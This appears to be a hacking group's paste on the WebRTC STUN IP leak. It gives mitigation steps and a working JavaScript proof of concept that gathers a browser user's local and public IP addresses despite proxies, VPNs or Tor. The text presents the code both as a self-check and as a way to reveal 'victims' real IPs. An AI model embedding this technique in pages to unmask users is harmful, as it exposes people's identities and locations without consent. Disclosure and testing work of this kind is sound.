[+] STUN IP Address requests for WebRTC [+]

1. We are...
2. _____ _________
3. / _ \ ____ ____ ____ / _____/ ____ ____
4. / /_\ \ / \ / _ \ / \ \_____ \_/ __ \_/ ___\
5. / | \ | ( <_> ) | \/ \ ___/\ \___
6. \____|__ /___| /\____/|___| /_______ /\___ >\___ >
7. \/ \/ \/ \/ \/ \/
8. //Laughing at your security since 2012*
9. =================================================================================================
10. Official Members: Mrlele - AnonSec666 - 3r3b0s - d3f4ult - PhantomGhost - Hannaichi - ap3x h4x0r
11. - Gh05tFr3ak - spider64 - OverKiller - Cyb3r Shzz0r - Pr3d4T0r - Mr. BlackList
12. - Razar - MR.WWW - AN0NT0XIC
13. =================================================================================================
14. #WebRTC #STUN #Servers #Javascript #Requests #IP #Disclosure #Proxy #VPN #Tor #Exploit #FBI #NSA
15.  
16.  
17. This technique will bypass proxies/vpns/and Tor to reveal your/victims real IP because the STUN requests are made outside of the normal XMLHttpRequest procedure. Firefox and Chrome have implemented WebRTC that allow requests to STUN servers be made that will return the local and public IP addresses for the user. These request results are available to javascript, so you can now obtain a users local and public IP addresses in *javascript*. Below is how to check if you vuln and demo yourself ;)
18.  
19.  
20.  
21. [+] WebRTC_STUN.html [+]
22. http://pastebin.com/PNsuhdUf
23.  
24.  
25.  
26. [+] How to Patch [+]
27. Chrome users, you should install the WebRTC block extension or ScriptSafe which should block the vulnerability.
28.  
29. Firefox users, you should use the NoScript addon
30. or
31. Alternatively, you can type “about:config” in the address bar and set the “media.peerconnection.enabled” setting to false.
32.  
33.  
34.  
35.  
36. or Copy and Paste this code below into WebBrowser Dev Console via F12 to check if vuln:
37. ----------------------------------------------------------------------------------------
38.  
39.  
40.  
41. //get the IP addresses associated with an account
42. function getIPs(callback){
43. var ip_dups = {};
44.  
45. //compatibility for firefox and chrome
46. var RTCPeerConnection = window.RTCPeerConnection
47. || window.mozRTCPeerConnection
48. || window.webkitRTCPeerConnection;
49. var mediaConstraints = {
50. optional: [{RtpDataChannels: true}]
51. };
52.  
53. //firefox already has a default stun server in about:config
54. // media.peerconnection.default_iceservers =
55. // [{"url": "stun:stun.services.mozilla.com"}]
56. var servers = undefined;
57.  
58. //add same stun server for chrome
59. if(window.webkitRTCPeerConnection)
60. servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]};
61.  
62. //construct a new RTCPeerConnection
63. var pc = new RTCPeerConnection(servers, mediaConstraints);
64.  
65. //listen for candidate events
66. pc.onicecandidate = function(ice){
67.  
68. //skip non-candidate events
69. if(ice.candidate){
70.  
71. //match just the IP address
72. var ip_regex = /([0-9]{1,3}(\.[0-9]{1,3}){3})/
73. var ip_addr = ip_regex.exec(ice.candidate.candidate)[1];
74.  
75. //remove duplicates
76. if(ip_dups[ip_addr] === undefined)
77. callback(ip_addr);
78.  
79. ip_dups[ip_addr] = true;
80. }
81. };
82.  
83. //create a bogus data channel
84. pc.createDataChannel("");
85.  
86. //create an offer sdp
87. pc.createOffer(function(result){
88.  
89. //trigger the stun server request
90. pc.setLocalDescription(result, function(){}, function(){});
91.  
92. }, function(){});
93. }
94.  
95. //Test: Print the IP addresses into the console
96. getIPs(function(ip){console.log(ip);});